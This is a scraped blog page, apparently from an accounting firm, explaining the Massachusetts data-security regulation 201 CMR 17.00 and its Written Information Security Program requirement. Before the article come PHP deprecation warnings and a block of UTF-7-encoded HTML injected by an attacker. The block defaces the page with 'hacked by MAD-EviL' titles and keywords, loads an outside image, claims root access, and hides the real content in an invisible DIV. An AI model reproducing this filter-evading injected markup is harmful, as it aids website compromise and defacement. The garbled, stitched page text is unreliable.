Deprecated: Assigning the return value of new by reference is deprecated in /home/cpaoffic/public_html/blog/wp-includes/cache.php on line 99

Deprecated: Assigning the return value of new by reference is deprecated in /home/cpaoffic/public_html/blog/wp-includes/query.php on line 21

Deprecated: Assigning the return value of new by reference is deprecated in /home/cpaoffic/public_html/blog/wp-includes/theme.php on line 576
+ADw-/title+AD4APA-html+AD4 +ADw-head+AD4 +ADw-meta http-equiv+AD0AIg-Content-Type+ACI content+AD0AIg-text/html+ADs charset+AD0-windows-1252+ACIAPg +ADw-title+AD4-hacked by MAD-EviL+ADw-/title+AD4 +ADw-meta name+AD0AIg-keywords+ACI content+AD0AIg-hacked by MAD-EviL hacked by MAD-EviL hacked by MAD-EviL mad-evil+ACIAPg +ADw-meta name+AD0AIg-description+ACI content+AD0AIg-hacked by MAD-EviL hacked by MAD-EviL+ACIAPg +ADw-/head+AD4 +ADw-body bgcolor+AD0AIgAj-000000+ACIAPg +ADw-p align+AD0AIg-center+ACIAPgA8-b+AD4APA-font size+AD0AIg-6+ACI color+AD0AIgAj-FFFFFF+ACIAPg-Own3d By MAD-EviL+ADw-br+AD4 +ADw-img border+AD0AIg-0+ACI src+AD0AIg-http://c.top4top.net/p+AF8-351c9wha1.jpg+ACI width+AD0AIg-520+ACI height+AD0AIg-366+ACIAPgA8-br+AD4 ./Und3r r00t+ADw-/font+AD4APA-/b+AD4APA-/p+AD4 +ADw-/body+AD4 +ADw-/html+AD4APA-DIV style+AD0AIg-DISPLAY: none+ACIAPgA8-xmp+AD4- » Blog Archive » Why Does Your Business Need A Written Information Security Program ?

Why Does Your Business Need A Written Information Security Program ?

In an attempt to protect its residents from the common types of identity theft, the Commonwealth of Massachusetts has adopted a new data security law, commonly known at attorney’s water cooler as “201 CMR 17.00″.  While the regulation became effective on March 1, 2010 many small businesses have not yet implemented the comprehensive Written Information Security Program (WISP) required under this new
law.

201 CMR 17.00 applies to any person or business that receives, stores or transmits personal information of Massachusetts residents.  If during the course of business with your clients you obtain their first name or initial and last name in combination with one or more of the following this law applies to your business:

  1. Their social security number;
  2. state issued id number, such as a driver’s license number;
  3. financial account information including bank account numbers, and;
  4. credit or debit card numbers.

The law requires that every person or business that handles the personal information of a Massachusetts resident develop, implement and maintain a WISP that contains a description of administrative, technical and physical safeguards in use by your business to protect personal information. Some safeguards may be as simple as locking file cabinets that contain personal information while others may be more technical in nature and require data encryption or other electronic security protocols.

Developing a written information security program requires a thorough assessment of your business’s needs, current practices and security methods. Fines for not complying with this law are hefty. Why take the risk of not protecting your business? Please call us to schedule an appointment, our knowledge of your business and the provisions of this law will help you be compliant in no time.

Leave a Reply